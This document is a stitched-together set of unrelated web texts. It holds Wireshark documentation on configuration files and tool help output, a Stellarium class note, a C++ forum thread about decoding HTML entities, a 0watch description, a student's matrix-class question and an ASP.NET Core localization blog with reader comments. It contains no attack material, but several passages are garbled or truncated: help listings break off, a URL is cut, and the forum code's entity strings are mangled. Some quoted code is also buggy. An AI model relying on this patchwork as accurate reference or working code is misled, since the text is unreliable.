If the address is not found in that file, Wireshark consults the ipxnets file in the system configuration folder. An example is: C0.A8.2C.00 HR c0-a8-1c-00 CEO 00:00:BE:EF IT_Server1 110f FileServer3 The settings from this file are read in when an IPX network number is to be translated to a name, and never written by Wireshark. At program start, if there is a manuf file in the global configuration folder, it is read. The entries in this file are used to translate MAC address prefixes into short and long manufacturer names. Each line consists of a MAC address prefix followed by an abbreviated manufacturer name and the full manufacturer name. Prefixes are 24 bits long by default and may be followed by an optional length. Note that this is not the same format as the ethers file. Examples are: 00:00:01 Xerox Xerox Corporation 00:50:C2:00:30:00/36 Microsof Microsoft The settings from this file are read in at program start and never written by Wireshark. This file contains your Wireshark preferences, including defaults for capturing and displaying packets. It is a simple text file containing statements of the form: variable: value At program start, if there is a preferences file in the global configuration folder, it is read first. Then, if there is a preferences file in the personal configuration folder, that is read; if there is a preference set in both files, the setting in the personal preferences file overrides the setting in the global preference file. If you press the Save button in the “Preferences” dialog box, all the current settings are written to the personal preferences file. This file contains GUI settings that are specific to the current profile, such as column widths and toolbar visibility. It is a simple text file containing statements of the form: variable: value It is read at program start and written when preferences are saved and at program exit. It is also written and read whenever you switch to a different profile.
This file contains common GUI settings, such as recently opened capture files, recently used filters, and window geometries. It is a simple text file containing statements of the form: variable: value It is read at program start and written when preferences are saved and at program exit. Wireshark uses the services files to translate port numbers into names. At program start, if there is a services file in the global configuration folder, it is read first. Then, if there is a services file in the personal configuration folder, that is read; if there is an entry for a given port number in both files, the setting in the personal services file overrides the entry in the global services file. An example is: mydns 5045/udp # My own Domain Name Server mydns 5045/tcp # My own Domain Name Server The settings from these files are read in at program start and never written by Wireshark. Wireshark uses the ss7pcs file to translate SS7 point codes to node names. At program start, if there is a ss7pcs file in the personal configuration folder, it is read. Each line in this file consists of one network indicator followed by a dash followed by a point code in decimal and a node name separated by whitespace or tab. An example is: 2-1234 MyPointCode1 The settings from this file are read in at program start and never written by Wireshark. Wireshark uses the subnets files to translate an IPv4 address into a subnet name. If no exact match from a hosts file or from DNS is found, Wireshark will attempt a partial match for the subnet of the address. At program start, if there is a subnets file in the personal configuration folder, it is read first. Then, if there is a subnets file in the global configuration folder, that is read; if there is a preference set in both files, the setting in the global preferences file overrides the setting in the personal preference file. Each line in one of these files consists of an IPv4 address, a subnet mask length separated only by "/" and a name separated by whitespace. The settings from these files are read in at program start and never written by Wireshark.
Wireshark uses the vlans file to translate VLAN tag IDs into names. If there is a vlans file in the currently active profile folder, it is used. Otherwise, the vlans file in the personal configuration folder is used. Each line in this file consists of one VLAN tag ID and a describing name separated by whitespace or tab. An example is: 123 Server-LAN 2049 HR-Client-LAN The settings from this file are read in at program start or when changing the active profile and are never written by Wireshark. Wireshark supports plugins for various purposes. Plugins can either be scripts written in Lua or code written in C or C++ and compiled to machine code. Wireshark looks for plugins in both a personal plugin folder and a global plugin folder. Lua plugins are stored in the plugin folders; compiled plugins are stored in subfolders of the plugin folders, with the subfolder name being the Wireshark minor version number (X.Y). There is another hierarchical level for each Wireshark plugin type (libwireshark, libwiretap and codecs). So for example the location for a libwireshark plugin foo.so (foo.dll on Windows) would be PLUGINDIR/X.Y/epan (libwireshark used to be called libepan; the other folder names are codecs and wiretap). Here you will find some details about the folders used in Wireshark on different Windows versions. As already mentioned, you can find the currently used folders in the “About Wireshark” dialog. Windows uses some special directories to store user configuration files which define the “user profile”. This can be confusing, as the default directory location changed from Windows version to version and might also be different for English and internationalized versions of Windows. The following guides you to the right place where to look for Wireshark’s profile data. Some larger Windows environments use roaming profiles. If this is the case, the configurations of all programs you use won’t be saved on your local hard drive.
They will be stored on the domain server instead. Your settings will travel with you from computer to computer with one exception. The “Local Settings” folder in your profile data (typically something like: C:\Documents and Settings\username\Local Settings) will not be transferred to the domain server. This is the default for temporary capture files. Wireshark uses the folder which is set by the TMPDIR or TEMP environment variable. This variable will be set by the Windows installer. Wireshark distinguishes between protocols (e.g. tcp) and protocol fields (e.g. tcp.port). A comprehensive list of all protocols and protocol fields can be found in the “Display Filter Reference” at Wireshark comes with an array of command line tools which can be helpful for packet analysis. Some of these tools are described in this chapter. You can find more information about all of Wireshark’s command line tools on the web site. TShark is a terminal oriented version of Wireshark designed for capturing and displaying packets when an interactive user interface isn’t necessary or available. It supports the same options as wireshark. For more information on tshark consult your local manual page ( man tshark) or the online version. Help information available from tshark. TShark (Wireshark) 3.5.0 (v3.5.0rc0-21-gce47866a4337) Dump and analyze network traffic. See for more information. Usage: tshark [options] ... (or '-' for stdin) Processing: -2 perform a two-pass analysis -M <packet count> perform session auto reset -R <read filter>, --read-filter <read filter> packet Read filter in Wireshark display filter syntax (requires -2) -Y <display filter>, --display-filter <display filter> packet displaY filter in Wireshark display filter syntax -H <hosts file> read a list of entries from a hosts file, which will then be written to a capture file.
(Implies -W n) --enable-protocol <proto_name> enable dissection of proto_name --disable-protocol <proto_name> disable dissection of proto_name --enable-heuristic <short_name> enable dissection of heuristic protocol --disable-heuristic <short_name> disable dissection of heuristic protocol Output: -w <outfile|-> write packets to a pcapng-format file named "outfile" (or '-' for stdout) --capture-comment <comment> set the capture file comment, if supported -P, --print print packet summary even when writing to a file -S <separator> the line separator to print between packets -x add output of hex and ASCII dump (Packet Bytes) -T pdml|ps|psml|json|jsonraw|ek|tabs|text|fields|? format of text output (def: text) -j <protocolfilter> protocols layers filter if -T ek|pdml|json selected (e.g. "ip ip.flags text", filter does not expand child nodes, unless child is specified also in the filter) -J <protocolfilter> top level protocol filter if -T ek|pdml|json selected (e.g. "http tcp", filter which expands all child nodes) -e <field> field to print if -Tfields selected (e.g.
tcp.port, _ws.col.Info) this option can be repeated to print multiple fields -E<fieldsoption>=<value> set options for output when -Tfields selected: bom=y|n print a UTF-8 BOM -t a|ad|adoy|d|dd|e|r|u|ud|udoy output format of time stamps -U tap_name PDUs export mode, see the man page for details -z <statistics> various statistics, see the man page for details --export-objects <protocol>,<destdir> save exported objects for a protocol to a directory named "destdir" --color color output text similarly to the Wireshark GUI, requires a terminal with 24-bit color support Also supplies color attributes to pdml and psml formats (Note that attributes are nonstandard) --no-duplicate-keys If -T json is specified, merge duplicate keys in an object into a single key with as value a json array containing all values --elastic-mapping-filter <protocols> If -G elastic-mapping is specified, put only the specified protocols within the mapping file Miscellaneous: -h, --help display this help and exit -v, --version display version info and exit -o <name>:<value> ... override preference setting -K <keytab> keytab file to use for kerberos decryption -G [report] dump one of several available reports and exit default report="fields" use "-G help" for more help Dumpcap can benefit from an enabled BPF JIT compiler if available. You might want to enable it by executing: "echo 1 > /proc/sys/net/core/bpf_jit_enable" Note that this can make your system less secure! For more information on tcpdump consult your local manual page ( man tcpdump) or the online version. Dumpcap is a network traffic dump tool. It captures packet data from a live network and writes the packets to a file. Dumpcap’s native capture file format is pcapng, which is also the format used by Wireshark. By default, Dumpcap uses the pcap library to capture traffic from the first available network interface and writes the received raw packet data, along with the packets’ time stamps into a pcapng file. The capture filter syntax follows the rules of the pcap library.
For more information on dumpcap consult your local manual page ( man dumpcap) or the online version. Help information available from dumpcap. Dumpcap (Wireshark) 3.5.0 (v3.5.0rc0-1363-geaf6554aa174) Capture network packets and dump them into a pcapng or pcap file. See for more information. Usage: dumpcap [options] ... Capture interface: -i <interface>, --interface <interface> name or idx of interface (def: first non-loopback), or for remote capturing, use one of these formats: rpcap://<host>/<interface> TCP@<host>:<port> --ifname <name> name to use in the capture file for a pipe from which we're capturing --ifdescr <description> description to use in the capture file for a pipe from which we're capturing -B <buffer size>, --buffer-size <buffer size> size of kernel buffer in MiB (def: 2MiB) -d print generated BPF code for capture filter -k <freq>,[<type>],[<center_freq1>],[<center_freq2>] set channel on wifi interface -S print statistics for each interface once per second -M for -D, -L, and -S, produce machine-readable output Output (files): -w <filename> name of file to save (def: tempfile) -g enable group read access on the output file(s) -b <ringbuffer opt.> ..., --ring-buffer <ringbuffer opt.> duration:NUM - switch to next file after NUM secs filesize:NUM - switch to next file after NUM kB files:NUM - ringbuffer: replace after NUM files packets:NUM - ringbuffer: replace after NUM packets interval:NUM - switch to next file when the time is an exact multiple of NUM secs printname:FILE - print filename to FILE when written (can use 'stdout' or 'stderr') -v, --version print version information and exit -h, --help display this help and exit Dumpcap can benefit from an enabled BPF JIT compiler if available. You might want to enable it by executing: "echo 1 > /proc/sys/net/core/bpf_jit_enable" Note that this can make your system less secure! Example: dumpcap -i eth0 -a duration:60 -w output.pcapng "Capture packets from interface eth0 until 60s passed into output.pcapng" Use Ctrl-C to stop capturing at any time.
capinfos can print information about capture files including the file type, number of packets, date and time information, and file hashes. Information can be printed in human and machine readable formats. For more information on capinfos consult your local manual page ( man capinfos) or the online version. Help information available from capinfos. Capinfos (Wireshark) 3.5.0 (v3.5.0rc0-21-gce47866a4337) -H display the SHA256, RMD160, and SHA1 hashes of the file Metadata infos: -n display number of resolved IPv4 and IPv6 addresses -D display number of decryption secrets -K disable displaying the capture comment Options are processed from left to right order with later options superseding or adding to earlier options. If no options are given the default is to display all infos in long report output format. Rawshark reads a stream of packets from a file or pipe, and prints a line describing its output, followed by a set of matching fields for each packet on stdout. For more information on rawshark consult your local manual page ( man rawshark) or the online version. Help information available from rawshark. Rawshark (Wireshark) 3.5.0 (v3.5.0rc0-21-gce47866a4337) Dump and analyze network traffic. See for more information. Usage: rawshark [options] ... Input file: -r <infile> set the pipe or file name to read from Processing: -d <encap:linktype>|<proto:protoname> packet encapsulation or protocol -F <field> field to display -m virtual memory limit, in bytes -n disable all name resolution (def: all enabled) -N <name resolve flags> enable specific name resolution(s): "mnNtdv" editcap is a general-purpose utility for modifying capture files. Its main function is to remove packets from capture files, but it can also be used to convert capture files from one format to another, as well as to print information about capture files. For more information on editcap consult your local manual page ( man editcap) or the online version. Help information available from editcap.
Editcap (Wireshark) 3.5.0 (v3.5.0rc0-663-g9faf6d4e7b67) -A <start time> only read packets whose timestamp is after (or equal to) the given time. -B <stop time> only read packets whose timestamp is before the given time. Time format for -A/-B options is YYYY-MM-DDThh:mm:ss[.nnnnnnnnn][Z|+-hh:mm] Unix epoch timestamps are also supported. Duplicate packet removal: --novlan remove vlan info from packets before checking for duplicates. NOTE: The use of the 'Duplicate packet removal' options with other editcap options except -v may not always work as expected. Specifically the -r, -t or -S options will very likely NOT have the desired effect if combined with the -d, -D or -w. --skip-radiotap-header skip radiotap header when checking for packet duplicates. Useful when processing packets captured by multiple radios on the same channel in the vicinity of each other. -o <offset> When used in conjunction with -E, skip some bytes from the beginning of the packet. This allows one to preserve some bytes, in order to have some headers untouched. --seed <seed> When used in conjunction with -E, set the seed to use for the pseudo-random number generator. This allows one to repeat a particular sequence of errors. -a <framenum>:<comment> Add or replace comment for given frame number. --inject-secrets <type>,<file> Insert decryption secrets from <file>. List supported secret types with "--inject-secrets help". --discard-all-secrets Discard all decryption secrets from the input file when writing the output file. Does not discard secrets added by "--inject-secrets" in the same command line. --capture-comment <comment> Add a capture file comment, if supported. --discard-capture-comment Discard capture file comments from the input file when writing the output file. Does not discard comments added by "--capture-comment" in the same command line. Miscellaneous: -h display this help and exit. -v verbose output.
If -v is used with any of the 'Duplicate Packet Removal' options (-d, -D or -w) then Packet lengths and MD5 hashes are printed to standard-error. -V, --version print version information and exit. Capture file types available from editcap -F. editcap: The available capture file types for the "-F" flag are: pcap - Wireshark/tcpdump/... - pcap pcapng - Wireshark/... - pcapng modpcap - Modified tcpdump - libpcap observer - Viavi Observer Encapsulation types available from editcap docsis31_xra31 - DOCSIS with Excentis XRA pseudo-header dpauxmon - DisplayPort AUX channel with Unigraf pseudo-header dpnss_link - Digital Private Signalling System No 1 Link Layer dvbci - DVB-CI (Common Interface) ebhscr - Elektrobit High Speed Capture and Replay enc - OpenBSD enc(4) encapsulating interface epon - Ethernet Passive Optical Network erf - Extensible Record Format ether - Ethernet ether-mpacket - IEEE 802.3br mPackets ether-nettl - Ethernet with nettl headers etw - Event Tracing for Windows messages gfp-f - ITU-T G.7041/Y.1303 Generic Framing Procedure Frame-mapped mode gfp-t - ITU-T G.7041/Y.1303 Generic Framing Procedure Transparent mode gprs-llc - GPRS LLC gsm_um - GSM Um Interface hhdlc - HiPath HDLC i2c-linux - I2C with Linux-specific pseudo-header ieee-802-11 - IEEE 802.11 Wireless LAN-ib - IP over IB ip-over-fc - RFC 2625 IP-over-Fibre Channel ip-over-ib - IP over InfiniBand ipfix - RFC 5655/RFC 5101 IPFIX ipmb-kontron - Intelligent Platform Management Bus with Kontron pseudo-header ipmi-trace - IPMI Trace Data Collection ipnet - Solaris IPNET irda - IrDA isdn - ISDN iso14443 - ISO 14443 contactless smartcard standards juniper-st - Juniper Secure Tunnel Information juniper-svcs - Juniper Services juniper-vn - Juniper VN v1 linux-sll2 - Linux cooked-mode capture v2 log_3GPP - 3GPP Phone Log loratap - LoRaTap ltalk - Localtalk message_analyzer_wfp_capture2_v4 - Message Analyzer WFP Capture2 v4 message_analyzer_wfp_capture2_v6 - Message Analyzer WFP Capture2 v6
message_analyzer_wfp_capture_auth_v4 - Message Analyzer WFP Capture Auth v4 message_analyzer_wfp_capture_auth_v6 - Message Analyzer WFP Capture Auth v6 message_analyzer_wfp_capture_v4 - Message Analyzer WFP Capture v4 message_analyzer_wfp_capture_v6 - Message Analyzer WFP Capture v6 mime - MIME most - Media Oriented Systems Transport mp2ts - ISO/IEC 13818-1 MPEG2-TS mp4 - MP4 files mpeg - MPEG mtp2 - SS7 MTP2 mtp2-with-phdr - MTP2 with pseudoheader mtp3 - SS7 MTP3 mux27010 - MUX27010 netanalyzer - Hilscher netANALYZER netanalyzer-transparent - Hilscher netANALYZER-Transparent netlink - Linux Netlink netmon_event - Network Monitor Network Event netmon_filter - Network Monitor Filter netmon_header - Network Monitor Header netmon_network_info - Network Monitor Network Info nfc-llcp - NFC LLCP nflog - NFLOG nordic_ble - Nordic BLE Sniffer - Apple Bluetooth rfc7468 - RFC 7468 file rtac-serial - RTAC serial-line ruby_marshal - Ruby marshal object s4607 - STANAG 4607 s5066-dpdu - STANAG 5066 Data Transfer Sublayer PDUs (D_PDU) sccp - SS7 SCCP sctp - SCTP sdh - SDH sdjournal - systemd journal usb-20 - USB 2.0/1.1/1.0 packets usb-darwin - USB packets with Darwin (macOS, etc.) headers usb-freebsd - USB packets with FreeBSD header vpp - Vector Packet Processing graph dispatch trace vsock - Linux vsock wpan-tap - IEEE 802.15.4 Wireless with TAP pseudo-header x2e-serial - X2E serial line capture x2e-xoraya - X2E Xoraya x25-nettl - X.25 with nettl headers xeth - Xerox 3MB Ethernet zwave-serial - Z-Wave Serial API packets Mergecap is a program that combines multiple saved capture files into a single output file specified by the -w argument. By default, Mergecap writes all of the packets in the input capture files to a pcapng file. The -F flag can be used to specify the capture file’s output format. For more information on mergecap consult your local manual page ( man mergecap) or the online version. Help information available from mergecap.
Mergecap (Wireshark) 3.5.0 (v3.5.0rc0-461-g969c1c0271bf). -V print version information and exit. Timestamps can be given on the command line. If not, the first packet is timestamped with the current time the conversion takes place. Multiple packets are written with timestamps differing by one microsecond. Text2pcap (Wireshark) 3.5.0 (v3.5.0rc0-461-g969c1c0271bf) used when generating dummy headers. The indication is only stored if the output format is pcapng. -m <max-packet> max packet length in output; default is 262144 -n use pcapng instead of pcap as output format. -N <intf-name> assign name to the interface in the pcapng file -6 <srcip>,<destip> prepend dummy IPv6 header with specified dest and source address. Example: -6 fe80::202:b3ff:fe1e:8329,2001:0db8:85a3:. -v print version information and exit. -d show detailed debug of parser states. -q generate no output at all (automatically disables -d). reordercap lets you reorder a capture file according to the packets' timestamps. For more information on reordercap consult your local manual page ( man reordercap) or the online version. Help information available from reordercap. Reordercap (Wireshark) 3.5.0 (v3.5.0rc0-461-g969c1c0271bf) Reorder timestamps of input file frames into output file. See for more information. Usage: reordercap [options] <infile> <outfile> Options: -n don't write to output file if the input file is ordered. -h display this help and exit. -v print version information and exit. As with the original license and documentation distributed with Wireshark, this document is covered by the GNU General Public License (GNU GPL). If you haven’t read the GPL before, please do so. It explains all the things that you are allowed to do with this code and documentation.
A title bar control used in windows derived from StelDialog. #include <Dialog.hpp> As window classes derived from StelDialog are basic QWidgets, they have no title bar. A BarFrame control needs to be used in each window's design to allow the user to move them. Typically, the frame should contain a centered label displaying the window's title and a button for closing the window (connected to the StelDialog::close() slot). To use the default Stellarium style for title bars, the BarFrame object of a given window should be named "TitleBar". See the normalStyle.css file for the style sheet description. Definition at line 42 of file Dialog.hpp.
C++ Replacing HTML Character Entities jmhobbs March 18th, 2008, 06:20 PM Hello, this is my first post on this forum, hope it works out :) I'm trying to do HTML entity decoding in C++, couldn't find any existing text out there to help out. Hows this look? It works on a small scale, but with lots of text it tends to stumble, even lock some times. Any ideas on performance here, or what I might be doing wrong? Thanks in advance! string htmlEntitiesDecode (string str) { string subs[] = { """, """, "'", "'", "&", "&", "<", "<", ">", ">" }; string reps[] = { "\"", "\"", "'", "'", "&", "&", "<", "<", ">", ">" }; size_t found; for(int j = 0; j <= 10; j++) { do { found = str.rfind(subs[j]); if (found != string::npos) str.replace (found,subs[j].length(),reps[j]); } while (found != string::npos); } return str; } 7stud March 18th, 2008, 11:24 PM 1)Here is what a string looks like in C++: "hello" Note how there are two quotation marks and only two quotation marks. One marks the beginning of the string and the other marks the end of the string. Now look at your subs array. Do all the strings in the subs array have two quote marks: one marking the beginning and the other marking the end? The syntax colors in your C++ editor should have alerted you to the problem. 2) If you replace a quote mark with a quote mark, will your do-while loop ever terminate? potatoCode March 18th, 2008, 11:44 PM Hello jmhobbs, this is a good practice, good for you! I think I see some problems here. 1. like 7stud had pointed out your first string in the first array of string is in error. (do it like you did in the 2nd array). 2. string::rfind returns the pos of the last occurrence. Your do-while loop exits on contingent to string::npos in side the For loop. Think what would happen if there was only one match.
your inner loop will not be iterated because the condition in the do/while will be always true. This is why sometimes it hangs(if not npos) and sometimes it works(if npos). And as for the scale issue, you can pass str by reference(no copying) instead of value. hope this helps :) 7stud March 19th, 2008, 12:03 AM 3) If there are 10 elements in an array, the index positions of the elements are numbered 0-9. So, your loop should terminate when j=10, i.e. when j=10, the loop should not execute. 4) Your subs and reps arrays need to be reworked. Half the elements in the subs array are being replaced by themselves, i.e. if you did nothing the result would be the same. Substituting a string with itself is a complete waste of time. 5) rfind? What's the matter with find()? My advice: start with one string in your subs array and one string in your reps array. Get your program working for that one string. Then add other strings one by one to the subs and reps arrays. dave2k March 19th, 2008, 10:09 AM there are probably a million ways to do this, but i would do somethng like this:#include <boost/algorithm/string/replace.hpp> #include <hash_map> #include <string> using namespace boost::algorithm; typedef std::hash_map<std::string, std::string> StrStrMap; void htmlEntitiesDecode(std::string& s) { StrStrMap m; m["&"] = "&"; //m["\""] = """; m["'"] = "'"; m["<"] = "<"; m[">"] = "&rt;"; StrStrMap::const_iterator i = m.begin(); for (i; i != m.end(); ++i) { replace_all(s, i->second, i->first); } } int main(int argc, char* argv[]) { std::string s = "gsdf"gsdfg&&fgg"; htmlEntitiesDecode(s); return 0; } I used a hash map here because the order i inserted the elements is important, i.e. you want to search for apersands first. Also notice that i commented out the " search. This was screwing up the string, but i am not entirely sure why. This is a html-parser: jmhobbs March 19th, 2008, 11:17 AM First off thanks to everyone who replied! To deal with the items raised... 
7stud: 1, 2, 4 The subs array actually looks like this (minus the spaces in the numeric escape codes): string subs[] = { "& #34;", """, "& #39;", "'", "& #38;", "&", "& #60;", "<", "& #62;", ">" }; It seems that in code blocks your forum leaves escape entities like "& quot;" alone but numeric "& #34;" codes it transforms. 7stud: 5 I grabbed some of the string manipulation code from something I did a long while back and didn't notice it was rfind. 7stud: 3 Oops. :) potatoCode: 2 I'm not sure I understand what you are saying there. The inner loop should terminate when there are no matches for that particular key (from the subs array, guided by the outer loop). Am I missing something there, I just don't see a problem. Thanks again for all your help, and that's a neat solution dave2k, I've never worked with the boost libraries before. potatoCode March 19th, 2008, 03:34 PM Hello jmhobbs, You are correct. I was wrong. Sorry if it made you confused. :) jmhobbs March 19th, 2008, 03:50 PM Thanks for your comments anyways :-) As a follow up, it seems to all be working fine now, here's my final code, with the spaces for the numeric entities. I had to add some numeric entities without the # sign because my source data has a bunch of those in it, I have no idea why. I guess people just do stupid things some times. string htmlEntitiesDecode (string str) { string subs[] = { "& #34;", """, "& #39;", "'", "& #38;", "&", "& #60;", "<", "& #62;", ">", "&34;", "&39;", "&38;", "&60;", "&62;" }; string reps[] = { "\"", "\"", "'", "'", "&", "&", "<", "<", ">", ">", "\"", "'", "&", "<", ">" }; size_t found; for(int j = 0; j < 15; j++) { do { found = str.find(subs[j]); if (found != string::npos) str.replace (found,subs[j].length(),reps[j]); } while (found != string::npos); } return str; } Thanks again to all those who commented!
0watch Maintainer: Bastian Eicher License: GNU Lesser General Public License Source: Zero Install feed: 0watch 0watch scans websites for new releases using arbitrary Python code snippets. When new releases are detected 0template is used to create/update a Zero Install feed. To make the 0watch command available on your command-line you can run: 0install add 0watch To use 0watch you need both a template file named like MyApp.xml.template and a watch file named like MyApp.watch.py in the same directory. You can then run: 0watch MyApp.watch.py Details A watch file is a Python script that pulls a list of releases from a website. It must set an attribute named releases to an array of dictionaries. Each array element represents a single release and each dictionary tuple is a variable substitution for the template. A basic watch file could look like this: from urllib import request import json data = request.urlopen(request.Request(' releases = [{'version': release['tag_name'], 'released': release['published_at'][0:10]} for release in json.loads(data)] For each release reported by the watch file 0watch attempts to determine whether the version is already known. It does this by: - checking if a file named MyApp-VERSION.xml exists in the same directory and - checking if a file named MyApp.xml exists in the same directory and contains an implementation with the version. 0watch then calls 0template once for each new release.
Hi, I am working on an exercise in operator overloading. I've created a matrix class and I am supposed to overload operators so I can do arithmetic on matrices efficiently. My directions say that I am supposed to make two matrix arrays using the class constructor that has 2 parameters and a third matrix array that will be used to store the result of arithmetic using the default constructor (1 parameter). Since I am going to use these arrays to overload operators they are going to need to be data members of the class (I think). However, I thought that classes were supposed to be as representative of real life things as possible, so making a matrix class with multiple arrays doesn't make sense to me (a matrix is only one matrix). Am I misunderstanding classes, or is there a different way to make additional matrices using the class constructor I am not thinking of? Thanks all, here is the code in question.

#include <iostream>
#include <iomanip>
#include <ctime>
#include <cstdlib>
#include <cmath>
using namespace std;

class matrix
{
    friend ostream& operator << (ostream&, const matrix&);
private:
    int size;
    int array[10][10];
public:
    matrix(int);
    matrix(int, int);
};

int main()
{
    int sizeIn, rangeIn;
    cout << "What size matrix would you like to generate?" << endl;
    cin >> sizeIn;
    cout << "What is the highest value you would like to allow a number in the matrix to be?" << endl;
    cin >> rangeIn;
    matrix arrayPrint(sizeIn, rangeIn);
    srand(static_cast<int>(time(NULL)));
    cout << arrayPrint << endl;
    return 0;
}

matrix::matrix(int sizeIn)
{
    int MAX_SIZE = 10;
    if (0 > sizeIn && sizeIn > 10) {
        size = MAX_SIZE;
    } else {
        size = sizeIn;
    }
    for (int i = 0; i < size; i++)
        for (int j = 0; j < size; j++)
            array[i][j] = 0;
}

matrix::matrix(int sizeIn, int rangeIn)
{
    int range;
    int MAX_SIZE = 10;
    int MAX_RANGE = 20;
    if (0 > sizeIn && sizeIn > 10) {
        size = MAX_SIZE;
    } else {
        size = sizeIn;
    }
    if (0 > rangeIn && rangeIn > 20) {
        range = MAX_RANGE;
    } else {
        range = rangeIn;
    }
    for (int i = 0; i < size; i++)
        for (int j = 0; j < size; j++)
            array[i][j] = (rand() % (2 * range + 1) - range);
}

ostream& operator << (ostream& os, const matrix& arrayPrint)
{
    for (int i = 0; i < arrayPrint.size; i++) {
        cout << '|';
        for (int j = 0; j < arrayPrint.size; j++) {
            os << setw(4) << arrayPrint.array[i][j] << " ";
        }
        os << setw(2) << '|' << endl;
    }
    return os;
}
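On the design question itself: the usual pattern (a sketch, not code from this thread; names are illustrative) is for arithmetic operators to build their result in a local object and return it by value, so the class never stores more than one array:

```cpp
// Sketch of the return-by-value pattern (illustrative names, not the
// thread's code): the class holds exactly one array, and operator+
// builds its result in a local object that is returned by value.
class Matrix {
public:
    explicit Matrix(int n) : size(n) {
        for (int i = 0; i < size; i++)
            for (int j = 0; j < size; j++)
                cells[i][j] = 0;
    }

    // Element access for filling in and reading values.
    int& at(int i, int j) { return cells[i][j]; }
    int at(int i, int j) const { return cells[i][j]; }

    Matrix operator+(const Matrix& other) const {
        Matrix result(size);  // the "third matrix" is a local, not a member
        for (int i = 0; i < size; i++)
            for (int j = 0; j < size; j++)
                result.cells[i][j] = cells[i][j] + other.cells[i][j];
        return result;
    }

private:
    int size;
    int cells[10][10];
};
```

With this shape, writing `Matrix c = a + b;` creates the third matrix the assignment asks for without the class itself ever holding more than one array.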
To serve people from any culture who use any language, most web applications nowadays have localization support. Localization is the process of translating content for a specific culture. It can be used to serve a multilingual, worldwide audience and achieve better market reach. In this blog, we are going to learn how to use localization in an ASP.NET Core web API with resource (.resx) files.

Prerequisites

The following are the prerequisites to integrate localization in an ASP.NET Core web API:

Create an ASP.NET Core REST API application

Follow these steps to create an ASP.NET Core REST API application in Visual Studio 2019:

Step 1: In Visual Studio 2019 (v16.4 or higher), go to File > New, and then select Project.
Step 2: Choose Create a new project.
Step 3: Select the ASP.NET Core Web Application template.
Step 4: Enter a Project name, and then click Create. The project template dialog will be displayed.
Step 5: Select the .NET Core, ASP.NET Core 3.1, API template (highlighted in the following screenshot).

Configuring start-up

Step 1: Register the necessary services for the localization process in the ConfigureServices method in the Startup.cs class: AddLocalization() and Configure<RequestLocalizationOptions>().
Step 2: Add the request localization middleware in the Configure method of the Startup.cs class.

Strategy for resource files

Resource files contain localizable strings based on the culture and the controller. We can maintain the resource files in two ways:

- A single culture resource file per controller.
- A single culture resource file for all controllers.

Single culture resource file per controller

In this method, you need to maintain a separate resource file for each culture and each controller, in either file structure (dot or path) as mentioned in this documentation.

Example: If you have two controllers and support for two cultures, then you need to maintain the resource files in the structure shown in the following screenshot.
Here, we have support for the US English and French languages.

Single culture resource file for all controllers

In this method, you maintain a single resource file per culture for all the controllers. To do this, you need to create an empty class with the same name as the resource file. The namespace of this empty class will be used to find the resource manager and resolve IStringLocalizer<T> abstractions.

Example: Regardless of the number of controllers, you maintain only one resource file for every culture supported. Refer to the following screenshot to see this approach in practice.

How to use localized values in controllers

ASP.NET Core provides built-in support for the IStringLocalizer and IStringLocalizer<T> abstractions. These abstractions are used to get values, based on the name of the string resource passed, from the respective culture resource file (e.g., HomeController.en-US.resx). To use localized values in the controllers, you need to inject the IStringLocalizer<T> abstraction based on the resource file structure mapped as shown in the following table.

Based on the injected IStringLocalizer<T> abstraction, the string localizer will map the resource file through the value passed as the shared resource (T). The string localizer will then return the mapped value from the resource file based on the name of the string resource you have passed.

Resources

You can find a copy of these samples in the following GitHub locations:

Conclusion

In this blog, we learned about implementing localization in an ASP.NET Core web API application. This feature helps to serve multilingual people from diverse cultures. Syncfusion provides over 70 high-performance, lightweight, modular, and responsive ASP.NET Core UI controls such as DataGrid, Charts, and Scheduler, and all of them have built-in support for localization. You can use them to improve your application development. Please share your feedback on this blog in the comments section.
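Pulling the start-up and controller steps above together, a minimal sketch might look like the following (class, resource, and culture names are illustrative and not taken from the post's screenshots):

```csharp
using System.Globalization;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Localization;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Localization;

public partial class Startup
{
    // Step 1 above: register the localization services.
    public void ConfigureServices(IServiceCollection services)
    {
        services.AddLocalization(options => options.ResourcesPath = "Resources");
        services.Configure<RequestLocalizationOptions>(options =>
        {
            var cultures = new[] { new CultureInfo("en-US"), new CultureInfo("fr") };
            options.DefaultRequestCulture = new RequestCulture("en-US");
            options.SupportedCultures = cultures;
            options.SupportedUICultures = cultures;
        });
        services.AddControllers();
    }

    // Step 2 above: add the request localization middleware.
    public void Configure(IApplicationBuilder app)
    {
        app.UseRequestLocalization();
        app.UseRouting();
        app.UseEndpoints(endpoints => endpoints.MapControllers());
    }
}

// A controller receiving IStringLocalizer<T>; "SharedResource" stands in
// for the empty class that shares its name with the .resx files.
public class HomeController : ControllerBase
{
    private readonly IStringLocalizer<SharedResource> _localizer;

    public HomeController(IStringLocalizer<SharedResource> localizer)
    {
        _localizer = localizer;
    }

    [HttpGet]
    public string Get() => _localizer["Greeting"]; // looks up "Greeting" for the request culture
}
```

Here "Greeting" is a hypothetical string resource name; with the file-per-culture layouts described above, the localizer resolves it against the .resx matching the request's culture.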
You can also contact us through our support forum, Direct-Trac, or feedback portal. We are waiting to hear from you!

Can we have common resource files for all controllers?

Hi ABHIJEET SHARMA, Yes, we can have a single common resource file for all controllers, per culture. You can refer to the sample below. Localization Sample: Regards, Ragunaathan M P

Hello. I am wondering if I can move the single resource culture file to a library project, or does it need to be part of the project where the controllers are present? Thanks,

Hi Uma, Yes, we can maintain resource files in any library project and refer to them in the API project. But we need to maintain an empty class with the same name as the resource file, where the namespace of this empty class will be used to find the resource manager and resolve IStringLocalizer abstractions, as explained in this blog. Regards, Ragunaathan M P

Can you provide an example? I am struggling to make it work. I am using the resource file in another project.

Hi Rashid, Kindly find the sample below, which I have prepared by referring to resource files from another project. Localization Sample: Regards, Ragunaathan M P

Hi Raghunaathan, In the same approach, can I externalize my resource files and put them in a CDN, so that when I add new language resource files there is no need to rebuild and deploy the application? Also, in that case, can I load the .resx file using something like IConfiguration to map it to the resource manager and use it? Regards, Ravi

Hi Ravi, In ASP.NET Core, localization resource files (".resx") are compiled into ".dll" files for each culture we maintain when building the project with the AddLocalization() services added to the service collection in the Startup class. Hence the resource manager cannot be configured using IConfiguration, and so it is better to maintain the resource files locally.
However, we need to deploy our application whenever we plan to release new features on a regular basis and include the localization changes along with the release. Regards, Ragunaathan M P
HackerBoxes 0009: Virtual Worlds

Introduction

